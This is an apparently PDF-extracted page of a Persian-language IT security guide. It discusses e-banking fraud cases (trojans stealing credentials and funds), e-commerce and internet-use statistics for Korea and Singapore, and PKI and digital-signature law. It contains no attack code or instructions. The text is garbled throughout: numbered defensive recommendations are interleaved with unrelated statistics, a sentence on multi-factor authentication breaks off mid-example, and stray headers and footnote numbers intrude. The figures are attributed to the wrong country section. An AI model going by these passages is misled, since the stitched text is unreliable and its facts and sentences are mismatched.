‫ﻣﻮﺭﺩ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺑﺤﺚ ﺧﻮﺩ ﺭﺍ ﺁﻏﺎﺯ ﻛﺮﺩﻧﺪ‪:‬‬
‫‪.۱‬‬
‫ﻧﻔﻮﺫﮔﺮﻱ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺗﺮﺍﻭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺗﻌﺪﺍﺩﻱ ﺭﻣﺰ‬
‫ﻋﺒﻮﺭ ﻭ ﺷﻨﺎﺳﻪ ﺍﻗﺪﺍﻡ ﻛـﺮﺩ ﻭ ﺗﻮﺍﻧـﺴﺖ ﺑـﻴﺶ ﺍﺯ ‪۳۵,۰۰۰‬‬
‫ﺩﻻﺭ ﺁﻣﺮﻳﻜﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺟﺎﺑﺠﺎ ﻛﻨﺪ‪.‬‬
‫‪.۲‬‬
‫ﻳﻚ ﻣﻮﺭﺩ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺑﺪﻟﻴﻞ ﺿﻌﻒ ﺁﮔﺎﻫﻲ ﻣﺸﺘﺮﻱ ﺩﺭ‬
‫ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭ ﺳﻴﺴﺘﻢ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺩﺭ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺭﻭﻱ ﺩﺍﺩ‪ .‬ﺑﺪﻟﻴﻞ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻥ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ‬
‫ﻻﺯﻡ‪ ،‬ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻮﺍﻧﺴﺘﻨﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪﻩ ﻭ ﺣﺪﻭﺩ ﺳﻪ‬
‫ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺳﺮﻗﺖ ﻛﻨﻨﺪ‪.‬‬
‫‪.۳‬‬
‫ﺩﺭ ﻳﻚ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻮﺍﻧﺴﺘﻨﺪ ﺣﺪﻭﺩ‬
‫‪ ۵‬ﻣﻴﻠﻴﻮﻥ ﺳﻬﻢ )ﺑﺎ ﺍﺭﺯﺷﻲ ﺑﺮﺍﺑﺮ ‪ ۲۱،۷‬ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺁﻣﺮﻳﻜـﺎ( ﺭﺍ‬
‫ﻓﺮﻭﺧﺘﻪ ﻭ ﺩﺭ ﻗﻴﻤﺖ ﺳﻬﺎﻡ ﻧﻮﺳﺎﻥ ﺷﺪﻳﺪﻱ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺤﺚ ﻛﺸﻮﺭ ﺳﻨﮕﺎﭘﻮﺭ ﺣﻮﻝ ﭼﻬﺎﺭ ﻣﺤﻮﺭ ﺍﺻـﻠﻲ ﺑـﻮﺩ‪ :‬ﺁﻣﺎﺭﻫـﺎ ﻭ‬
‫ﻧﻜﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺸﻮﺭ ﻛـﺮﻩ‪ ،‬ﻭﺿـﻌﻴﺖ ﺍﻗﺘـﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﻣﻠﻲ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‪ ،‬ﻭ ﻭﺍﻛﻨﺸﻬﺎﻱ ﺩﻭﻟـﺖ ﺩﺭ ﺣـﻮﺍﺩﺙ‬
‫ﺍﺧﻴﺮ‪ .‬ﺑﺤﺚ ﺑﺎ ﺍﺭﺍﺋﻪ ﺷﻮﺍﻫﺪﻱ ﺍﺯ ﺭﺷﺪ ﺳﺮﻳﻊ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺧـﻼﻝ‬
‫ﺳﺎﻟﻬﺎﻱ ‪ ۱۹۹۸‬ﺗﺎ ‪ ،۲۰۰۱‬ﺍﺯ ﻣﻮﺭﺩ ﺍﻭﻝ ﺷﺮﻭﻉ ﺷﺪ‪:‬‬
‫‪.۱‬‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﺣﺴﺎﺑﻬﺎﻱ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﺭﺍ ﺛﺒﺖ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﺍﻣﺮ‬
‫ﺑﻪ ﻣﻌﻨﻲ ﻛﻨﺘﺮﻝ ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﺍﻧﺘﻘﺎﻟﻬـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ‬
‫ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﺩﺭﺁﻣﺪﻫﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺣـﺪﻭﺩ‬
‫‪ ۴۰‬ﻣﻴﻠﻴﻮﻥ ﺩﻻﺭ ﺑﻮﺩ ﻭ ﺩﺭ ﺳـﺎﻝ ‪ ۲۰۰۱‬ﺑـﻪ ‪ ۹۱‬ﻣﻴﻠﻴـﻮﻥ‬
‫ﺩﻻﺭ ﺭﺳﻴﺪ‪.‬‬
‫‪.۲‬‬
‫ﻣﻌﺎﻣﻼﺕ ﺑﺎﻧﻜﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﻣﻌﺎﻣﻼﺕ ﻭ ﺣﺴﺎﺑﻬﺎﻱ ﻣـﺸﻜﻮﻙ ﺑـﺎ ﺻـﺎﺣﺒﺎﻥ ﺣـﺴﺎﺑﻬﺎ‬
‫ﻫﻤﺎﻫﻨﮕﻲ ﻣﺠﺪﺩ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ )ﺍﺯ ﻃﺮﻳﻖ ‪ ،SMS‬ﻳﺎ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(‪.‬‬
‫•‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﺗﻌﺪﺍﺩ ‪ ۱۴,۰۰۰‬ﺧﺎﻧﻮﺍﺭ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﺑـﺎ‬
‫ﺳﺮﻋﺖ ﺑﺎﻻ ﻣﺘﺼﻞ ﺑﻮﺩﻧﺪ ﻭ ﺍﻳﻦ ﺗﻌﺪﺍﺩ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺑﻪ‬
‫‪ ۷،۸‬ﻣﻴﻠﻴﻮﻥ ﻣﻌﺎﺩﻝ ‪ %۶۴‬ﺟﻤﻌﻴﺖ ﺭﺳﻴﺪ‪.‬‬
‫‪.۳‬‬
‫ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﺍﻋﺘﺒﺎﺭ ﻣﺸﺘﺮﻱ ﺍﺯ ﻋﻮﺍﻣﻞ ﭼﻨﺪﮔﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ )ﺑﺮ ﺍﺳﺎﺱ ﺍﺑﺰﺍﺭﻱ ﻛﻪ ﺗﻨﻬﺎ ﻣـﺸﺘﺮﻱ ﺁﻧـﺮﺍ ﺩﺍﺭﺩ؛ ﻣﺜـﻞ ﻛـﺎﺭﺕ‬
‫ﺩﺭﺳﻬﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺍﻳﻦ ﺭﻭﻳﺪﺍﺩﻫﺎ ﮔﺮﻓﺖ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﺳﻨﮕﺎﭘﻮﺭ‬
‫‪230 Personal Firewalls‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺭ ﻫﻨﮓﻛﻨﮓ‪ ،‬ﺩﻭﻟﺖ ﺑﺎ ﺑﺎﻧﻜﻬﺎ ﻭ ﭘﻠﻴﺲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺭﻭﻳـﺪﺍﺩﻫﺎ‬
‫ﻭ ﺧﻄﺮﺍﺕ ﻫﻤﻜﺎﺭﻱ ﻣﻲ ﻛﻨﺪ ﻭ ﺑـﺎ ﺍﻋﻤـﺎﻝ ﻣـﺪﻳﺮﻳﺖ ﺍﺛـﺮﺑﺨﺶ‪،‬‬
‫ﭘﺎﺳــﺨﮕﻮﻳﻲ ﺭﺍ ﺗــﻀﻤﻴﻦ‪ ،‬ﺭﻭﻳــﺪﺍﺩﻫﺎ ﺭﺍ ﮔــﺰﺍﺭﺵ‪ ،‬ﺧــﺴﺎﺭﺗﻬﺎ ﺭﺍ‬
‫ﻛﻨﺘﺮﻝ‪ ،‬ﻭ ﺍﻋﺘﻤﺎﺩ ﻋﻤﻮﻣﻲ ﺭﺍ ﺟﻠﺐ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻃﻴـﻒ ﻭﺳـﻴﻊ ﻣـﺸﻜﻼﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ‪ISP‬ﻫﺎ‪ ،‬ﺗﻨﻮﻉ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻮﺟـﻮﺩ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ‬
‫ﻧﺤــﻮﺓ ﻛﻨﺘــﺮﻝ‪ ،‬ﺍﻳﻤــﻦﺳــﺎﺯﻱ‪ ،‬ﻭ ﺁﮔــﺎﻩﻛــﺮﺩﻥ ﻋﻤــﻮﻡ ﺩﺭ ﻣــﻮﺭﺩ‬
‫ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺷﻮﺍﺭ ﮔﺮﺩﺩ‪.‬‬
‫‪٢١٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﺗﻨﻬـﺎ ‪ ۳‬ﻣﻴﻠﻴـﻮﻥ ﻛـﺎﺭﺑﺮ ﺍﻳﻨﺘﺮﻧـﺖ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺷﺖ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺭﻗﻢ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺑﻪ ‪ ۲۴‬ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ‬
‫)ﻧﻴﻤﻲ ﺍﺯ ﺟﻤﻌﻴﺖ ﻛﺮﻩ( ﺭﺳﻴﺪ‪.‬‬
‫•‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳﻴﺎﺭ ﺗﻮﺳـﻂ ﺑـﻴﺶ ﺍﺯ ‪%۵۰‬‬
‫ﺟﻤﻌﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﻼ ﺍﺛﺒﺎﺕ ﺷـﺪﻩ‬
‫ﻋﻤﻮﻣﻴﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻨﮕﺎﭘﻮﺭ ﻛﺎﻣ ﹰ‬
‫ﺍﺳﺖ‪ .‬ﺑﺎﻧﻜﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺩﺭ ﺍﻳـﻦ ﻛـﺸﻮﺭ ﺑـﺴﻴﺎﺭ ﻓﺮﺍﮔﻴـﺮ ﻭ‬
‫ﻣﺤﺒﻮﺏ ﻫﺴﺘﻨﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺟﻤﻌﻴﺖ ﺍﻧﺪﻙ ‪ ۴‬ﻣﻴﻠﻴﻮﻧﻲ‪ ،‬ﺗﻘﺮﻳﺒﹰﺎ ‪%۲۵‬‬
‫ﺟﻤﻌﻴﺖ ﺍﺯ ﺧـﺪﻣﺎﺕ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻬـﺮﻩ ﻣـﻲﮔﻴﺮﻧـﺪ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻨﻬﺎ ﺻﻨﻌﺖ ﻧﻴـﺰ ﺑـﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﺍﺳـﺖ‪.‬‬
‫ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۹۷‬ﺷـﺮﻭﻉ ﺷـﺪ ﻭ ﺍﻛﻨـﻮﻥ ﺣـﺪﻭﺩ‬
‫‪ %۵۰‬ﻛﻞ ﻣﻌﺎﻣﻼﺕ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺍﺧﺘـﺼﺎﺹ ﺩﺍﺩﻩ ﺍﺳـﺖ‪ .‬ﺍﻣـﺎ ﺩﺭ‬
‫ﻧﻘﻄﺔ ﻣﻘﺎﺑﻞ‪ ،‬ﺻﻨﻌﺖ ﺑﻴﻤﺔ ﺍﻳﻦ ﺣﻮﺯﻩ ﺑـﻪ ﺍﻳـﻦ ﺳـﺮﻋﺖ ﺩﺭﺣـﺎﻝ‬
‫ﺭﺷﺪ ﻧﻴﺴﺖ‪ ،‬ﺍﮔﺮﭼﻪ ﻃﺒﻴﻌﺖ ﺁﻥ ﺍﻳﻨﻄﻮﺭ ﺍﻳﺠﺎﺏ ﻣﻲﻛﻨﺪ‪ .‬ﺧـﺪﻣﺎﺕ‬
‫ﻻ ﻧﻴﺎﺯ ﺑﻪ ﺑﻮﻣﻲﺳﺎﺯﻱ ﺩﺍﺭﻧﺪ ﻭ ﻛﻤﺘﺮ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺮﺍﻱ‬
‫ﺑﻴﻤﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻫﻤﻪﺟﺎ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺛﺎﺑﺖ ﻭ ﻛﺎﺭﺁﻱ ﺑﻴﻤﻪ ﺗﻌﻴﻴﻦ ﻛﺮﺩ‪.‬‬
‫ﺑﺎ ﻧﮕﺎﻩ ﺑﻪ ﺟﻨﺒﺔ ﺟﻨﺎﻳﻲ ﺍﻳﻦ ﺗﺤﻮﻻﺕ‪ ،‬ﺁﻣﺎﺭﻫﺎ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻭﻗـﻮﻉ‬
‫ﺗﻘﺮﻳﺒﹰﺎ ‪ ۱۰۰‬ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺧـﻼﻝ ﺳـﺎﻟﻬﺎﻱ ‪ ۱۹۹۶‬ﻭ ‪۱۹۹۷‬‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۰‬ﺍﻳﻦ ﺁﻣﺎﺭ ﺑﻪ ﻋﺪﺩ ‪ ۵,۰۰۰‬ﺭﺳﻴﺪ ﻭ ﺩﺭﺣﺎﻝ‬
‫ﺣﺎﺿﺮ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﻋﺪﻱ ﺩﺭﺣـﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ‪ .‬ﺍﮔﺮﭼـﻪ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﻤﻮﻣﻴﺖ ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﺩﻭ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﺧﻴﺮ‬
‫)ﻛﻪ ﺫﻳ ﹰﻼ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷـﺪﻩ( ﺑﺎﺭ ﺩﻳﮕﺮ ﺍﻫﻤﻴﺖ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺭﻭﺷـﻦ‬
‫ﻣﻲﻛﻨﻨﺪ‪:‬‬
‫‪.۱‬‬
‫ﺩﺭ ﻳﻚ ﺭﺧﺪﺍﺩ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﺰﺭﮔﺘـﺮﻳﻦ ﺑﺎﻧـﻚ‬
‫ﺳﻨﮕﺎﭘﻮﺭﻱ ﺁﻟﻮﺩﻩ ﺑﻪ ﺍﻧﻮﺍﻋﻲ ﺍﺯ ﺗﺮﺍﻭﺍﻫﺎ ﺷﺪ‪ .‬ﺍﻳـﻦ ﺗﺮﺍﻭﺍﻫـﺎ‬
‫ﺑﻄﻮﺭ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻭ‬
‫ﺑﺮﺍﻱ ﺁﺩﺭﺳﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦﺷﺪﻩ ﺍﺭﺳﺎﻝ ﻣـﻲﻛﺮﺩﻧـﺪ ﻭ‬
‫ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺳﺎﺭﻗﻴﻦ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﻣﻘﺎﺩﻳﺮ ﻋﻈﻴﻤﻲ ﭘﻮﻝ ﺑـﻪ‬
‫ﺳﺮﻗﺖ ﺑﺒﺮﻧﺪ‪ .‬ﺍﻳﻦ ﺗﺮﺍﻭﺍﻱ ﺧﺎﺹ ﺁﻧﻘﺪﺭ ﭘﻴﺸﺮﻓﺘﻪ ﺑﻮﺩ ﻛـﻪ‬
‫ﺍﺯ ﺿﺪﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺑﻬﺎ ﺑﻪ ﺳﻼﻣﺖ ﻋﺒﻮﺭ ﻣﻲﻛـﺮﺩ‪.‬‬
‫ﺍﺯ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻣﻲﺗﻮﺍﻥ ﻧﺘﻴﺠﻪ ﮔﺮﻓﺖ ﻛـﻪ ﺍﻳـﻦ ﺍﺑﺰﺍﺭﻫـﺎ‬
‫)ﺿﺪﻭﻳﺮﻭﺱ ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ( ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﺩﻓـﺎﻋﻲ‬
‫ﺑﺮﺍﻱ ﻳﻚ ﻣﺤﻴﻂ ﺍﻗﺘﺼﺎﺩﻱ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪.۲‬‬
‫ﺣﺎﺩﺛﺔ ﺩﻳﮕﺮ ﺩﺭ ﺩﻭﻣﻴﻦ ﺑﺎﻧﻚ ﺑﺰﺭﮒ ﺳـﻨﮕﺎﭘﻮﺭ ﺭﻭﻱ ﺩﺍﺩ‪،‬‬
‫ﺍﻣﺎ ﺗﻮﺟﻪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﺑـﻪ ﺧـﻮﺩ ﺟﻠـﺐ‬
‫ﻧﻜﺮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ‬
‫ﺁﺳﻴﺐ ﺩﻳﺪﻧﺪ ﻛﻪ ﻭﺻﻠﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﻭﻱ ﺁﻧﻬـﺎ ﺍﻋﻤـﺎﻝ‬
‫ﻧﺸﺪﻩ ﺑﻮﺩ‪ .‬ﺟﺰﺋﻴﺎﺕ ﺍﻳﻦ ﺣﻤﻠﻪ ﺑﺪﻟﻴﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻓﺎﺵ‬
‫ﻧﺸﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﺣﺎﺩﺛﻪ ﻧﻴﺰ ﺑﺎﺭ ﺩﻳﮕﺮ ﻟـﺰﻭﻡ ﻫﻤﻜـﺎﺭﻱ‬
‫ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﮔﺬﺍﺷﺖ‪.‬‬
‫ﺩﻭﻟﺖ ﺳﻨﮕﺎﭘﻮﺭ ﺑﻄﻮﺭ ﻓﻌﺎﻝ ﺑﻪ ﻣﻮﺿﻮﻉ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤـﻮﻣﻲ‬
‫)‪ (PKI‬ﭘﺮﺩﺍﺧﺘﻪ ﺍﺳﺖ‪" .‬ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ" ﺳﻨﮕﺎﭘﻮﺭ )ﻣﺼﻮﺏ‬
‫ﺳﺎﻝ ‪ (۱۹۹۹‬ﻣﺴﺌﻮﻟﻴﺖ ‪ PKI‬ﺍﻳﻦ ﻛﺸﻮﺭ ﺭﺍ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ‬
‫ﻭ ﺍﻃﻼﻋﺎﺕ ﺳﭙﺮﺩﻩ ﺍﺳﺖ ﻭ ﺑﺮﻧﺎﻣﺔ ‪ PKI‬ﻣﻠﻲ ﺍﻳﻦ ﻛﺸﻮﺭ‪ ،‬ﻣﺮﺍﻛـﺰ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ٢٣١‬ﻣﻌﺘﺒﺮ ﺭﺍ ﻣﻌﻴﻦ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﻣﺎ ﺍﺯ ﮔﻮﺍﻫﻲ ﻧـﻮﻋﻲ ﺷـﻨﺎﺧﺖ ﺩﻭﺟﺎﻧﺒـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻭ ﺳـﺎﺯﻣﺎﻥ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻛﺮﻩ )‪ ٢٣٢(KISA‬ﺑﻴﺸﺘﺮ ﺑﺎ ﻣﻮﺿﻮﻋﺎﺕ ﺗﻜﻨﻴﻜـﻲ‬
‫ﻣﺜﻞ ﻧﻈﺎﺭﺕ ﺑﺮ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﺗـﺼﺪﻳﻖ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ‪ ،‬ﻭ ﺍﻧﺠـﺎﻡ‬
‫ﺗﺤﻘﻴﻘﺎﺕ ﻭ ﺗﻮﺳﻌﻪ ﺩﺭﺑﺎﺭﺓ ‪ PKI‬ﺳﻴﻤﻲ ﻭ ﺑـﻲﺳـﻴﻢ ﺳـﺮ ﻭ ﻛـﺎﺭ‬
‫ﺩﺍﺭﺩ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺷـﺶ ﻣﺮﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ‬
‫ﮔﻮﺍﻫﻲ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﭼﻮﻥ ﮔﻮﺍﻫﻲﻫـﺎ ﺗﻮﺳـﻂ ﺗﻤـﺎﻡ ﻣﺮﺍﻛـﺰ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻗﺎﺑﻞ ﺷﻨﺎﺳـﺎﻳﻲ ﻫـﺴﺘﻨﺪ‪ ،‬ﻣـﺸﺘﺮﻱ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ‬
‫ﻣﻌﺎﻣﻼﺕ ﻣﺨﺘﻠﻒ ﻳﻚ ﺍﻣﻀﺎﻱ ﻭﺍﺣﺪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺤﺖ ﺣﻤﺎﻳﺖ ﻗﺎﻧﻮﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺎ‬
‫ﺍﻳﻨﺤﺎﻝ ﭼﺎﻟﺸﻬﺎﻳﻲ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ‪ ،‬ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ‬
‫ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺻﻨﻌﺖ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﺓ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻣﺎ‬
‫ﺍﻳﻦ ﺩﺭ ﻣﻮﺭﺩ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺳﻄﻪﺍﻱ )ﺩﻻﻟﻬﺎ( ﺻﺎﺩﻕ ﻧﻴﺴﺖ‪ :‬ﺍﺯ ‪۳۶‬‬
‫ﻣﺆﺳﺴﺔ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺗﻨﻬﺎ ﭼﻬﺎﺭ ﻣﺆﺳـﺴﻪ ﺍﺯ ﻣﺮﺍﻛـﺰ ﻣﻌﺘﺒـﺮ ﺻـﺪﻭﺭ‬
‫ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ‪ .‬ﺩﻭ ﺩﻟﻴﻞ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺍﻳـﻦ ﺍﻣـﺮ ﺑـﺮ‬
‫ﺷﻤﺮﺩ‪:‬‬
‫‪.۱‬‬
‫ﺗﺠﺎﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﺳـﺎﻝ ‪ - ۱۹۹۷‬ﺩﻭ ﺳـﺎﻝ ﭘـﻴﺶ ﺍﺯ‬
‫ﺗﺼﻮﻳﺐ ﻗﺎﻧﻮﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ‪ -‬ﺷﺮﻭﻉ ﺷﺪ‪ .‬ﻟـﺬﺍ ﺍﻳـﻦ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻗﺒﻞ ﺍﺯ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ‪،‬‬
‫ﻣﺸﻜﻠﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ‪.‬‬
‫‪.۲‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺩﺭ‬
